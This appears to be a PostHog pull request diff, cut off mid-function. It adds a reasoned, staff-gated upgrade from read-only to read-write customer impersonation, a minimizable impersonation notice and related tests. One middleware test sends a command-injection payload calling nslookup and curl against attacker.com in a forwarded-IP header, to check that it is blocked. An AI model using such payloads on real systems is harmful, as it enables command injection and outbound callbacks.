### PR TITLE
feat: Upgrade to read-write impersonation

### DIFF
--- a/ee/admin/loginas_views.py
+++ b/ee/admin/loginas_views.py
@@ -54,7 +54,7 @@ def upgrade_impersonation(request):
         return JsonResponse({"error": "A reason is required to upgrade impersonation"}, status=400)
 
     staff_user = get_original_user_from_session(request)
-    if not staff_user:
+    if not staff_user or not staff_user.is_staff:
         return JsonResponse({"error": "Unable to upgrade impersonation"}, status=400)
 
     if IMPERSONATION_READ_ONLY_SESSION_KEY in request.session:

--- a/ee/admin/loginas_views.py
+++ b/ee/admin/loginas_views.py
@@ -1,14 +1,16 @@
 import json
 
+import posthoganalytics
 from django.http import Http404, JsonResponse
 from django.views.decorators.http import require_http_methods
-
-import posthoganalytics
 from loginas.utils import is_impersonated_session
 from loginas.views import user_login as loginas_user_login
 
 from posthog.helpers.impersonation import get_original_user_from_session
-from posthog.middleware import IMPERSONATION_READ_ONLY_SESSION_KEY, is_read_only_impersonation
+from posthog.middleware import (
+    IMPERSONATION_READ_ONLY_SESSION_KEY,
+    is_read_only_impersonation,
+)
 from posthog.models import User
 
 
@@ -51,7 +53,9 @@ def upgrade_impersonation(request):
         reason = ""
 
     if not reason:
-        return JsonResponse({"error": "A reason is required to upgrade impersonation"}, status=400)
+        return JsonResponse(
+            {"error": "A reason is required to upgrade impersonation"}, status=400
+        )
 
     staff_user = get_original_user_from_session(request)
     if not staff_user or not staff_user.is_staff:

--- a/ee/urls.py
+++ b/ee/urls.py
@@ -12,7 +12,7 @@ from django_otp.plugins.otp_totp.models import TOTPDevice
 from posthog.middleware import impersonated_session_logout
 from posthog.views import api_key_search_view, redis_edit_ttl_view, redis_values_view
 
-from ee.admin.loginas_views import loginas_user
+from ee.admin.loginas_views import loginas_user, upgrade_impersonation
 from ee.admin.oauth_views import admin_auth_check, admin_oauth_success
 from ee.api import integration
 from ee.api.vercel import vercel_sso, vercel_webhooks
@@ -144,6 +144,7 @@ if settings.ADMIN_PORTAL_ENABLED:
             name="loginas-logout",
         ),
         path("admin/login/user/<str:user_id>/", loginas_user, name="loginas-user-login"),
+        path("admin/impersonation/upgrade/", upgrade_impersonation, name="impersonation-upgrade"),
         path("admin/", include("loginas.urls")),
         path("admin/", admin.site.urls),
     ]

--- a/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationNotice.scss
+++ b/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationNotice.scss
@@ -5,7 +5,9 @@
     border: 1px solid var(--border);
     border-radius: var(--radius);
     box-shadow: var(--shadow-elevation-3000);
-    transition: box-shadow 150ms ease;
+    transition:
+        width 200ms cubic-bezier(0.4, 0, 0.2, 1),
+        box-shadow 150ms ease;
 
     &--read-only {
         .ImpersonationNotice__sidebar {
@@ -43,6 +45,14 @@
             0 8px 24px rgb(0 0 0 / 20%);
     }
 
+    &--minimized {
+        width: auto;
+
+        .ImpersonationNotice__sidebar {
+            border-radius: calc(var(--radius) - 1px) 0 0 calc(var(--radius) - 1px);
+        }
+    }
+
     &__sidebar {
         display: flex;
         flex-shrink: 0;
@@ -60,6 +70,37 @@
 
     &__drag-handle {
         flex-shrink: 0;
+    }
+
+    &__minimized-content {
+        display: flex;
+        align-items: center;
+        justify-content: center;
+        padding: 0.5rem;
+        cursor: pointer;
+        animation: ImpersonationNotice__fadeScaleIn 200ms cubic-bezier(0.4, 0, 0.2, 1);
+
+        &:hover {
+            background-color: var(--color-bg-surface-secondary);
+        }
+    }
+
+    &__minimized-icon {
+        flex-shrink: 0;
+        font-size: 1.25rem;
+        transition: transform 150ms ease;
+
+        .ImpersonationNotice__minimized-content:hover & {
+            transform: scale(1.1);
+        }
+    }
+
+    &--read-only &__minimized-icon {
+        color: var(--warning);
+    }
+
+    &--read-write &__minimized-icon {
+        color: var(--danger);
     }
 
     &__main {
@@ -102,5 +143,17 @@
         font-size: 0.8125rem;
         line-height: 1.5;
         color: var(--text-primary);
+    }
+}
+
+@keyframes ImpersonationNotice__fadeScaleIn {
+    from {
+        opacity: 0;
+        transform: scale(0.8);
+    }
+
+    to {
+        opacity: 1;
+        transform: scale(1);
     }
 }

--- a/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationNotice.tsx
+++ b/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationNotice.tsx
@@ -1,12 +1,12 @@
 import './ImpersonationNotice.scss'
 
 import { useActions, useValues } from 'kea'
-import { useEffect, useState } from 'react'
+import { useEffect, useRef, useState } from 'react'
 
-import { IconEllipsis, IconWarning } from '@posthog/icons'
-import { LemonButton, LemonMenu } from '@posthog/lemon-ui'
+import { IconCollapse, IconEllipsis, IconWarning } from '@posthog/icons'
+import { LemonButton, LemonMenu, Tooltip } from '@posthog/lemon-ui'
 
-import { DraggableWithSnapZones } from 'lib/components/DraggableWithSnapZones'
+import { DraggableWithSnapZones, DraggableWithSnapZonesRef } from 'lib/components/DraggableWithSnapZones'
 import { dayjs } from 'lib/dayjs'
 import { usePageVisibility } from 'lib/hooks/usePageVisibility'
 import { IconDragHandle } from 'lib/lemon-ui/icons'
@@ -14,6 +14,7 @@ import { cn } from 'lib/utils/css-classes'
 import { userLogic } from 'scenes/userLogic'
 
 import { ImpersonationReasonModal } from './ImpersonationReasonModal'
+import { impersonationNoticeLogic } from './impersonationNoticeLogic'
 
 function CountDown({ datetime, callback }: { datetime: dayjs.Dayjs; callback?: () => void }): JSX.Element {
     const [now, setNow] = useState(dayjs())
@@ -48,28 +49,36 @@ function CountDown({ datetime, callback }: { datetime: dayjs.Dayjs; callback?: (
 }
 
 export function ImpersonationNotice(): JSX.Element | null {
-    const { user, userLoading, isImpersonationUpgradeInProgress } = useValues(userLogic)
-    const { logout, loadUser, upgradeImpersonation } = useActions(userLogic)
-    const [isUpgradeModalOpen, setIsUpgradeModalOpen] = useState(false)
+    const { user, userLoading } = useValues(userLogic)
+    const { logout, loadUser } = useActions(userLogic)
 
+    const { isMinimized, isUpgradeModalOpen, isReadOnly, isImpersonated, isImpersonationUpgradeInProgress } =
+        useValues(impersonationNoticeLogic)
+    const { minimize, maximize, openUpgradeModal, closeUpgradeModal, upgradeImpersonation, setPageVisible } =
+        useActions(impersonationNoticeLogic)
+
+    const { isVisible: isPageVisible } = usePageVisibility()
+
+    const draggableRef = useRef<DraggableWithSnapZonesRef>(null)
     const [isDragging, setIsDragging] = useState(false)
 
-    // Close modal when upgrade completes successfully
-    useEffect(() => {
-        if (isUpgradeModalOpen && !isImpersonationUpgradeInProgress && user?.is_impersonated_read_only === false) {
-            setIsUpgradeModalOpen(false)
-        }
-    }, [isUpgradeModalOpen, isImpersonationUpgradeInProgress, user?.is_impersonated_read_only])
-
-    if (!user?.is_impersonated) {
-        return null
+    const handleMinimize = (): void => {
+        minimize()
+        draggableRef.current?.trySnapTo('bottom-right')
     }
 
-    const isReadOnly = user.is_impersonated_read_only
+    useEffect(() => {
+        setPageVisible(isPageVisible)
+    }, [isPageVisible])
+
+    if (!isImpersonated || !user) {
+        return null
+    }
 
     return (
         <>
             <DraggableWithSnapZones
+                ref={draggableRef}
                 handle=".ImpersonationNotice__sidebar"
                 defaultSnapPosition="bottom-right"
                 persistKey="impersonation-notice-position"
@@ -80,69 +89,85 @@ export function ImpersonationNotice(): JSX.Element | null {
                     className={cn(
                         'ImpersonationNotice',
                         isDragging && 'ImpersonationNotice--dragging',
+                        isMinimized && 'ImpersonationNotice--minimized',
                         isReadOnly ? 'ImpersonationNotice--read-only' : 'ImpersonationNotice--read-write'
                     )}
                 >
                     <div className="ImpersonationNotice__sidebar">
                         <IconDragHandle className="ImpersonationNotice__drag-handle" />
                     </div>
-                    <div className="ImpersonationNotice__main">
-                        <div className="ImpersonationNotice__header">
-                            <IconWarning className="ImpersonationNotice__warning-icon" />
-                            <span className="ImpersonationNotice__title">
-                                {isReadOnly ? 'Read-only impersonation' : 'Read-write impersonation'}
-                            </span>
-                            {isReadOnly && (
-                                <LemonMenu
-                                    items={[
-                                        {
-                                            label: 'Upgrade to read-write',
-                                            onClick: () => setIsUpgradeModalOpen(true),
-                                        },
-                                    ]}
-                                >
-                                    <LemonButton size="xsmall" icon={<IconEllipsis />} />
-                                </LemonMenu>
-                            )}
-                        </div>
-                        <div className="ImpersonationNotice__content">
-                            <p className="ImpersonationNotice__message">
-                                Signed in as <span className="text-warning">{user.email}</span>
-                                {user.organization?.name && (
-                                    <>
-                                        {' '}
-                                        from <span className="text-warning">{user.organization.name}</span>
-                                    </>
+                    {isMinimized && (
+                        <Tooltip title="Signed in as a customer - click to expand">
+                            <div className="ImpersonationNotice__minimized-content" onClick={maximize}>
+                                <IconWarning className="ImpersonationNotice__minimized-icon" />
+                            </div>
+                        </Tooltip>
+                    )}
+                    {!isMinimized && (
+                        <div className="ImpersonationNotice__main">
+                            <div className="ImpersonationNotice__header">
+                                <IconWarning className="ImpersonationNotice__warning-icon" />
+                                <span className="ImpersonationNotice__title">
+                                    {isReadOnly ? 'Read-only impersonation' : 'Read-write impersonation'}
+                                </span>
+                                {isReadOnly && (
+                                    <LemonMenu
+                                        items={[
+                                            {
+                                                label: 'Upgrade to read-write',
+                                                onClick: openUpgradeModal,
+                                            },
+                                        ]}
+                                    >
+                                        <LemonButton size="xsmall" icon={<IconEllipsis />} />
+                                    </LemonMenu>
                                 )}
-                                .
-                                {user.is_impersonated_until && (
-                                    <>
-                                        {' '}
-                                        Expires in{' '}
-                                        <CountDown datetime={dayjs(user.is_impersonated_until)} callback={loadUser} />.
-                                    </>
-                                )}
-                            </p>
-                            <div className="flex gap-2 justify-end">
-                                <LemonButton
-                                    type="secondary"
-                                    size="small"
-                                    onClick={() => loadUser()}
-                                    loading={userLoading}
-                                >
-                                    Refresh
-                                </LemonButton>
-                                <LemonButton type="secondary" status="danger" size="small" onClick={() => logout()}>
-                                    Log out
-                                </LemonButton>
+                                <LemonButton size="xsmall" icon={<IconCollapse />} onClick={handleMinimize} />
+                            </div>
+                            <div className="ImpersonationNotice__content">
+                                <p className="ImpersonationNotice__message">
+                                    Signed in as <span className="text-warning">{user.email}</span>
+                                    {user.organization?.name && (
+                                        <>
+                                            {' '}
+                                            from <span className="text-warning">{user.organization.name}</span>
+                                        </>
+                                    )}
+                                    .
+                                    {user.is_impersonated_until && (
+                                        <>
+                                            {' '}
+                                            Expires in{' '}
+                                            <CountDown
+                                                datetime={dayjs(user.is_impersonated_until)}
+                                                callback={loadUser}
+                                            />
+                                            .
+                                        </>
+                                    )}
+                                </p>
+                                <div className="flex gap-2 justify-end">
+                                    <LemonButton
+                                        type="secondary"
+                                        size="small"
+                                        onClick={() => loadUser()}
+                                        loading={userLoading}
+                                    >
+                                        Refresh
+                                    </LemonButton>
+                                    <LemonButton type="secondary" status="danger" size="small" onClick={() => logout()}>
+                                        Log out
+                                    </LemonButton>
+                                </div>
                             </div>
                         </div>
-                    </div>
+                    )}
                 </div>
             </DraggableWithSnapZones>
+
             <ImpersonationReasonModal
                 isOpen={isUpgradeModalOpen}
-                onClose={() => setIsUpgradeModalOpen(false)}
+                onClose={closeUpgradeModal}
                 onConfirm={upgradeImpersonation}
                 title="Upgrade to read-write impersonation"
                 description="Read-write mode allows you to make changes on behalf of the user. Please provide a reason for this upgrade."

--- a/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationNotice.tsx
+++ b/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationNotice.tsx
@@ -48,11 +48,18 @@ function CountDown({ datetime, callback }: { datetime: dayjs.Dayjs; callback?: (
 }
 
 export function ImpersonationNotice(): JSX.Element | null {
-    const { user, userLoading } = useValues(userLogic)
+    const { user, userLoading, isImpersonationUpgradeInProgress } = useValues(userLogic)
     const { logout, loadUser, upgradeImpersonation } = useActions(userLogic)
     const [isUpgradeModalOpen, setIsUpgradeModalOpen] = useState(false)
 
     const [isDragging, setIsDragging] = useState(false)
+
+    // Close modal when upgrade completes successfully
+    useEffect(() => {
+        if (isUpgradeModalOpen && !isImpersonationUpgradeInProgress && user?.is_impersonated_read_only === false) {
+            setIsUpgradeModalOpen(false)
+        }
+    }, [isUpgradeModalOpen, isImpersonationUpgradeInProgress, user?.is_impersonated_read_only])
 
     if (!user?.is_impersonated) {
         return null
@@ -140,6 +147,7 @@ export function ImpersonationNotice(): JSX.Element | null {
                 title="Upgrade to read-write impersonation"
                 description="Read-write mode allows you to make changes on behalf of the user. Please provide a reason for this upgrade."
                 confirmText="Upgrade"
+                loading={isImpersonationUpgradeInProgress}
             />
         </>
     )

--- a/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationReasonModal.tsx
+++ b/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationReasonModal.tsx
@@ -1,0 +1,73 @@
+import { ReactNode, useState } from 'react'
+
+import { LemonButton, LemonInput, LemonModal } from '@posthog/lemon-ui'
+
+export interface ImpersonationReasonModalProps {
+    isOpen: boolean
+    onClose: () => void
+    onConfirm: (reason: string) => void
+    title: string
+    description?: string
+    confirmText?: string
+    children?: ReactNode
+}
+
+export function ImpersonationReasonModal({
+    isOpen,
+    onClose,
+    onConfirm,
+    title,
+    description,
+    confirmText = 'Confirm',
+    children,
+}: ImpersonationReasonModalProps): JSX.Element {
+    const [reason, setReason] = useState('')
+
+    const handleConfirm = (): void => {
+        onConfirm(reason)
+        setReason('')
+        onClose()
+    }
+
+    const handleClose = (): void => {
+        setReason('')
+        onClose()
+    }
+
+    return (
+        <LemonModal
+            isOpen={isOpen}
+            onClose={handleClose}
+            title={title}
+            footer={
+                <>
+                    <LemonButton type="secondary" onClick={handleClose}>
+                        Cancel
+                    </LemonButton>
+                    <LemonButton
+                        type="primary"
+                        onClick={handleConfirm}
+                        disabledReason={!reason.trim() ? 'Please provide a reason' : undefined}
+                    >
+                        {confirmText}
+                    </LemonButton>
+                </>
+            }
+            width={500}
+        >
+            <div className="space-y-2">
+                {description && <p className="text-sm text-secondary">{description}</p>}
+                <div>
+                    <label className="block mb-1 font-semibold">Reason</label>
+                    <LemonInput
+                        value={reason}
+                        onChange={setReason}
+                        placeholder="e.g., Customer support request #12345"
+                        autoFocus
+                    />
+                </div>
+                {children}
+            </div>
+        </LemonModal>
+    )
+}

--- a/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationReasonModal.tsx
+++ b/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationReasonModal.tsx
@@ -27,7 +27,6 @@ export function ImpersonationReasonModal({
 
     const handleConfirm = (): void => {
         onConfirm(reason)
-        setReason('')
     }
 
     const handleClose = (): void => {
@@ -49,7 +48,7 @@ export function ImpersonationReasonModal({
                         type="primary"
                         onClick={handleConfirm}
                         loading={loading}
-                        disabledReason={!reason.trim() ? 'Please provide a reason' : undefined}
+                        disabledReason={!loading && !reason.trim() ? 'Please provide a reason' : undefined}
                     >
                         {confirmText}
                     </LemonButton>

--- a/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationReasonModal.tsx
+++ b/frontend/src/layout/navigation/ImpersonationNotice/ImpersonationReasonModal.tsx
@@ -5,10 +5,11 @@ import { LemonButton, LemonInput, LemonModal } from '@posthog/lemon-ui'
 export interface ImpersonationReasonModalProps {
     isOpen: boolean
     onClose: () => void
-    onConfirm: (reason: string) => void
+    onConfirm: (reason: string) => void | Promise<void>
     title: string
     description?: string
     confirmText?: string
+    loading?: boolean
     children?: ReactNode
 }
 
@@ -19,6 +20,7 @@ export function ImpersonationReasonModal({
     title,
     description,
     confirmText = 'Confirm',
+    loading = false,
     children,
 }: ImpersonationReasonModalProps): JSX.Element {
     const [reason, setReason] = useState('')
@@ -26,7 +28,6 @@ export function ImpersonationReasonModal({
     const handleConfirm = (): void => {
         onConfirm(reason)
         setReason('')
-        onClose()
     }
 
     const handleClose = (): void => {
@@ -47,6 +48,7 @@ export function ImpersonationReasonModal({
                     <LemonButton
                         type="primary"
                         onClick={handleConfirm}
+                        loading={loading}
                         disabledReason={!reason.trim() ? 'Please provide a reason' : undefined}
                     >
                         {confirmText}

--- a/frontend/src/layout/navigation/ImpersonationNotice/impersonationNoticeLogic.ts
+++ b/frontend/src/layout/navigation/ImpersonationNotice/impersonationNoticeLogic.ts
@@ -1,0 +1,81 @@
+import { actions, connect, kea, listeners, path, reducers, selectors } from 'kea'
+
+import { userLogic } from 'scenes/userLogic'
+
+import { UserType } from '~/types'
+
+import type { impersonationNoticeLogicType } from './impersonationNoticeLogicType'
+
+export const impersonationNoticeLogic = kea<impersonationNoticeLogicType>([
+    path(['layout', 'navigation', 'ImpersonationNotice', 'impersonationNoticeLogic']),
+
+    connect({
+        values: [userLogic, ['user', 'isImpersonationUpgradeInProgress']],
+        actions: [userLogic, ['upgradeImpersonation', 'upgradeImpersonationSuccess']],
+    }),
+
+    actions({
+        minimize: true,
+        maximize: true,
+        openUpgradeModal: true,
+        closeUpgradeModal: true,
+        setPageVisible: (visible: boolean) => ({ visible }),
+        clearPageHiddenAt: true,
+    }),
+
+    reducers({
+        isMinimized: [
+            false,
+            {
+                minimize: () => true,
+                maximize: () => false,
+            },
+        ],
+        isUpgradeModalOpen: [
+            false,
+            {
+                openUpgradeModal: () => true,
+                closeUpgradeModal: () => false,
+            },
+        ],
+        pageHiddenAt: [
+            null as number | null,
+            {
+                // Store timestamp when page becomes hidden - used to work out if we
+                // should auto expand when page regains focus
+                setPageVisible: (state, { visible }) => (visible ? state : Date.now()),
+                clearPageHiddenAt: () => null,
+            },
+        ],
+    }),
+
+    selectors({
+        isReadOnly: [(s) => [s.user], (user: UserType | null): boolean => user?.is_impersonated_read_only ?? true],
+        isImpersonated: [(s) => [s.user], (user: UserType | null): boolean => user?.is_impersonated ?? false],
+    }),
+
+    listeners(({ actions, values }) => ({
+        upgradeImpersonationSuccess: () => {
+            if (values.isUpgradeModalOpen && !values.isReadOnly) {
+                actions.closeUpgradeModal()
+            }
+        },
+        setPageVisible: ({ visible }) => {
+            if (!visible) {
+                return
+            }
+            const { pageHiddenAt } = values
+            actions.clearPageHiddenAt()
+            // Auto-maximize when window regains focus to ensure staff
+            // users are reminded they are impersonating a customer
+            // Only trigger if away for more than 30 seconds though to
+            // avoid being annoying if quickly switching between windows
+            if (values.isMinimized && pageHiddenAt) {
+                const secondsAway = (Date.now() - pageHiddenAt) / 1000
+                if (secondsAway > 30) {
+                    actions.maximize()
+                }
+            }
+        },
+    })),
+])

--- a/frontend/src/lib/components/DraggableWithSnapZones/index.ts
+++ b/frontend/src/lib/components/DraggableWithSnapZones/index.ts
@@ -1,2 +1,2 @@
 export { DraggableWithSnapZones } from './DraggableWithSnapZones'
-export type { DraggableWithSnapZonesProps, SnapPosition } from './DraggableWithSnapZones'
+export type { DraggableWithSnapZonesProps, DraggableWithSnapZonesRef, SnapPosition } from './DraggableWithSnapZones'

--- a/frontend/src/scenes/userLogic.ts
+++ b/frontend/src/scenes/userLogic.ts
@@ -26,6 +26,7 @@ export const userLogic = kea<userLogicType>([
         loadUser: (resetOnFailure?: boolean) => ({ resetOnFailure }),
         updateCurrentOrganization: (organizationId: string, destination?: string) => ({ organizationId, destination }),
         logout: true,
+        upgradeImpersonation: (reason: string) => ({ reason }),
         updateUser: (user: Partial<UserType>, successCallback?: () => void) => ({
             user,
             successCallback,
@@ -118,6 +119,19 @@ export const userLogic = kea<userLogicType>([
                     } catch (error: any) {
                         console.error(error)
                         actions.updateUserFailure(error.message)
+                        return values.user
+                    }
+                },
+                upgradeImpersonation: async ({ reason }) => {
+                    try {
+                        await api.create('admin/impersonation/upgrade/', { reason })
+                        lemonToast.success('Upgraded to read-write impersonation')
+                        // Reload user to get updated impersonation state
+                        actions.loadUser()
+                        return values.user
+                    } catch (error: any) {
+                        console.error(error)
+                        lemonToast.error('Failed to upgrade impersonation')
                         return values.user
                     }
                 },

--- a/frontend/src/scenes/userLogic.ts
+++ b/frontend/src/scenes/userLogic.ts
@@ -130,7 +130,7 @@ export const userLogic = kea<userLogicType>([
 
                         // optimistically update user to read-write rather than
                         // waiting for `loadUser` to complete
-                        return { ...values.user, is_impersonated_read_only: false }
+                        return values.user ? { ...values.user, is_impersonated_read_only: false } : null
                     } catch (error: any) {
                         console.error(error)
                         lemonToast.error('Failed to upgrade impersonation')

--- a/frontend/src/scenes/userLogic.ts
+++ b/frontend/src/scenes/userLogic.ts
@@ -125,10 +125,12 @@ export const userLogic = kea<userLogicType>([
                 upgradeImpersonation: async ({ reason }) => {
                     try {
                         await api.create('admin/impersonation/upgrade/', { reason })
-                        lemonToast.success('Upgraded to read-write impersonation')
-                        // Reload user to get updated impersonation state
                         actions.loadUser()
-                        return values.user
+                        lemonToast.success('Upgraded to read-write impersonation')
+
+                        // optimistically update user to read-write rather than
+                        // waiting for `loadUser` to complete
+                        return { ...values.user, is_impersonated_read_only: false }
                     } catch (error: any) {
                         console.error(error)
                         lemonToast.error('Failed to upgrade impersonation')
@@ -152,6 +154,14 @@ export const userLogic = kea<userLogicType>([
                     last_name: user?.last_name || '',
                     email: user?.email || '',
                 }),
+            },
+        ],
+        isImpersonationUpgradeInProgress: [
+            false,
+            {
+                upgradeImpersonation: () => true,
+                upgradeImpersonationSuccess: () => false,
+                upgradeImpersonationFailure: () => false,
             },
         ],
     }),

--- a/posthog/helpers/impersonation.py
+++ b/posthog/helpers/impersonation.py
@@ -1,0 +1,20 @@
+from datetime import timedelta
+
+from django.contrib.auth import get_user_model
+from django.core.signing import TimestampSigner
+
+from loginas import settings as la_settings
+
+
+def get_original_user_from_session(request):
+    """Extract the original staff user from an impersonated session."""
+    try:
+        signer = TimestampSigner()
+        original_session = request.session.get(la_settings.USER_SESSION_FLAG)
+        original_user_pk = signer.unsign(
+            original_session, max_age=timedelta(days=la_settings.USER_SESSION_DAYS_TIMESTAMP)
+        )
+        User = get_user_model()
+        return User.objects.get(pk=original_user_pk)
+    except Exception:
+        return None

--- a/posthog/middleware.py
+++ b/posthog/middleware.py
@@ -889,6 +889,8 @@ READ_ONLY_IMPERSONATION_ALLOWLISTED_PATHS: list[str | re.Pattern] = [
     re.compile(r"^/api/(environments|projects)/([0-9]+|@current)/metalytics/?$"),
     re.compile(r"^/api/(environments|projects)/([0-9]+|@current)/endpoints/[^/]+/run/?$"),
     re.compile(r"^/api/(environments|projects)/([0-9]+|@current)/endpoints/last_execution_times/?$"),
+    # Allow upgrading from read-only to read-write impersonation
+    "/admin/impersonation/upgrade/",
 ]
 
 

--- a/posthog/test/test_middleware.py
+++ b/posthog/test/test_middleware.py
@@ -1136,6 +1136,18 @@ class TestUpgradeImpersonation(APIBaseTest):
         )
         assert response.status_code == 400
 
+    @patch("ee.admin.loginas_views.get_original_user_from_session", return_value=None)
+    def test_upgrade_returns_400_when_staff_user_not_found(self, mock_get_staff):
+        self.login_as_read_only()
+
+        response = self.client.post(
+            reverse("impersonation-upgrade"),
+            data=json.dumps({"reason": "Some reason"}),
+            content_type="application/json",
+        )
+        assert response.status_code == 400
+        assert response.json()["error"] == "Unable to upgrade impersonation"
+
 
 @override_settings(SESSION_COOKIE_AGE=100)
 class TestSessionAgeMiddleware(APIBaseTest):

--- a/posthog/test/test_middleware.py
+++ b/posthog/test/test_middleware.py
@@ -1148,6 +1148,21 @@ class TestUpgradeImpersonation(APIBaseTest):
         assert response.status_code == 400
         assert response.json()["error"] == "Unable to upgrade impersonation"
 
+    def test_upgrade_returns_400_when_staff_demoted_mid_session(self):
+        self.login_as_read_only()
+
+        # Revoke staff privileges mid-session
+        self.user.is_staff = False
+        self.user.save()
+
+        response = self.client.post(
+            reverse("impersonation-upgrade"),
+            data=json.dumps({"reason": "Some reason"}),
+            content_type="application/json",
+        )
+        assert response.status_code == 400
+        assert response.json()["error"] == "Unable to upgrade impersonation"
+
 
 @override_settings(SESSION_COOKIE_AGE=100)
 class TestSessionAgeMiddleware(APIBaseTest):

--- a/posthog/test/test_middleware.py
+++ b/posthog/test/test_middleware.py
@@ -1,3 +1,4 @@
+import json
 from datetime import datetime, timedelta
 
 from freezegun import freeze_time
@@ -72,7 +73,9 @@ class TestAccessMiddleware(APIBaseTest):
         ):
             with self.settings(TRUSTED_PROXIES="10.0.0.1"):
                 response = self.client.get(
-                    "/", REMOTE_ADDR="10.0.0.1", headers={"x-forwarded-for": "192.168.0.1,10.0.0.1"}
+                    "/",
+                    REMOTE_ADDR="10.0.0.1",
+                    headers={"x-forwarded-for": "192.168.0.1,10.0.0.1"},
                 )
                 self.assertNotIn(b"PostHog is not available", response.content)
 
@@ -83,7 +86,9 @@ class TestAccessMiddleware(APIBaseTest):
         ):
             with self.settings(TRUSTED_PROXIES="10.0.0.1"):
                 response = self.client.get(
-                    "/", REMOTE_ADDR="10.0.0.1", headers={"x-forwarded-for": "192.168.0.1,10.0.0.2"}
+                    "/",
+                    REMOTE_ADDR="10.0.0.1",
+                    headers={"x-forwarded-for": "192.168.0.1,10.0.0.2"},
                 )
                 self.assertEqual(response.status_code, 403)
                 self.assertIn(b"PostHog is not available", response.content)
@@ -95,7 +100,9 @@ class TestAccessMiddleware(APIBaseTest):
         ):
             with self.settings(TRUST_ALL_PROXIES=True):
                 response = self.client.get(
-                    "/", REMOTE_ADDR="10.0.0.1", headers={"x-forwarded-for": "192.168.0.1,10.0.0.1"}
+                    "/",
+                    REMOTE_ADDR="10.0.0.1",
+                    headers={"x-forwarded-for": "192.168.0.1,10.0.0.1"},
                 )
                 self.assertNotIn(b"PostHog is not available", response.content)
 
@@ -126,7 +133,11 @@ class TestAccessMiddleware(APIBaseTest):
 
     def test_ip_with_port_stripped(self):
         """IP addresses with ports should have the port stripped before validation."""
-        with self.settings(ALLOWED_IP_BLOCKS=["192.168.0.0/24"], USE_X_FORWARDED_HOST=True, TRUST_ALL_PROXIES=True):
+        with self.settings(
+            ALLOWED_IP_BLOCKS=["192.168.0.0/24"],
+            USE_X_FORWARDED_HOST=True,
+            TRUST_ALL_PROXIES=True,
+        ):
             # IPv4 with port
             response = self.client.get("/", headers={"x-forwarded-for": "192.168.0.1:8080"})
             self.assertNotIn(b"PostHog is not available", response.content)
@@ -138,10 +149,15 @@ class TestAccessMiddleware(APIBaseTest):
 
     def test_malformed_ip_blocked(self):
         """Malformed IPs and attack payloads should be blocked (fail closed)."""
-        with self.settings(ALLOWED_IP_BLOCKS=["0.0.0.0/0"], USE_X_FORWARDED_HOST=True, TRUST_ALL_PROXIES=True):
+        with self.settings(
+            ALLOWED_IP_BLOCKS=["0.0.0.0/0"],
+            USE_X_FORWARDED_HOST=True,
+            TRUST_ALL_PROXIES=True,
+        ):
             # Attack payload in XFF header
             response = self.client.get(
-                "/", headers={"x-forwarded-for": "nslookup${IFS}attacker.com||curl${IFS}attacker.com"}
+                "/",
+                headers={"x-forwarded-for": "nslookup${IFS}attacker.com||curl${IFS}attacker.com"},
             )
             self.assertIn(b"PostHog is not available", response.content)
 
@@ -201,7 +217,9 @@ class TestAutoProjectMiddleware(APIBaseTest):
         self.assertEqual(response_users_api_data.get("team", {}).get("id"), self.second_team.id)
         self.assertEqual(response_dashboards_api.status_code, 200)
 
-    def test_project_switched_when_accessing_dashboard_of_another_accessible_team_with_trailing_slash(self):
+    def test_project_switched_when_accessing_dashboard_of_another_accessible_team_with_trailing_slash(
+        self,
+    ):
         dashboard = Dashboard.objects.create(team=self.second_team)
 
         response_app = self.client.get(f"/dashboard/{dashboard.id}/")
@@ -215,7 +233,9 @@ class TestAutoProjectMiddleware(APIBaseTest):
         self.assertEqual(response_users_api_data.get("team", {}).get("id"), self.second_team.id)
         self.assertEqual(response_dashboards_api.status_code, 200)
 
-    def test_project_unchanged_when_accessing_dashboard_of_another_off_limits_team(self):
+    def test_project_unchanged_when_accessing_dashboard_of_another_off_limits_team(
+        self,
+    ):
         _, _, third_team = Organization.objects.bootstrap(
             None,
             name="Third Party",
@@ -261,7 +281,9 @@ class TestAutoProjectMiddleware(APIBaseTest):
         self.assertEqual(response_users_api_data.get("team", {}).get("id"), self.second_team.id)
         self.assertEqual(response_insights_api.status_code, 200)
 
-    def test_project_switched_when_accessing_insight_edit_mode_of_another_accessible_team(self):
+    def test_project_switched_when_accessing_insight_edit_mode_of_another_accessible_team(
+        self,
+    ):
         insight = Insight.objects.create(team=self.second_team)
 
         response_app = self.client.get(f"/insights/{insight.short_id}/edit")
@@ -304,7 +326,9 @@ class TestAutoProjectMiddleware(APIBaseTest):
         self.assertEqual(response_cohorts_api.status_code, 200)
 
     @override_settings(PERSON_ON_EVENTS_V2_OVERRIDE=False)
-    def test_project_switched_when_accessing_feature_flag_of_another_accessible_team(self):
+    def test_project_switched_when_accessing_feature_flag_of_another_accessible_team(
+        self,
+    ):
         feature_flag = FeatureFlag.objects.create(team=self.second_team, created_by=self.user)
 
         with self.assertNumQueries(self.base_app_num_queries + 7):  # +1 from activity logging _get_before_update()
@@ -379,12 +403,16 @@ class TestAutoProjectMiddleware(APIBaseTest):
             == f"/project/{self.third_team.pk}/replay/018f5c3e-1a17-7f2b-ac83-32d06be3269b?t=2601"
         )
 
-    def test_project_redirects_to_current_team_when_accessing_missing_project_by_token(self):
+    def test_project_redirects_to_current_team_when_accessing_missing_project_by_token(
+        self,
+    ):
         res = self.client.get(f"/project/phc_123/home")
         assert res.status_code == 302
         assert res.headers["Location"] == f"/project/{self.team.pk}/home"
 
-    def test_project_redirects_to_current_team_when_accessing_inaccessible_project_by_token(self):
+    def test_project_redirects_to_current_team_when_accessing_inaccessible_project_by_token(
+        self,
+    ):
         res = self.client.get(f"/project/{self.no_access_team.api_token}/home")
         assert res.status_code == 302
         assert res.headers["Location"] == f"/project/{self.team.pk}/home"
@@ -815,13 +843,18 @@ class TestImpersonationReadOnlyMiddleware(APIBaseTest):
 
         assert response.status_code == 200
 
-    def test_read_only_impersonation_blocks_set_current_organization_with_other_fields(self):
+    def test_read_only_impersonation_blocks_set_current_organization_with_other_fields(
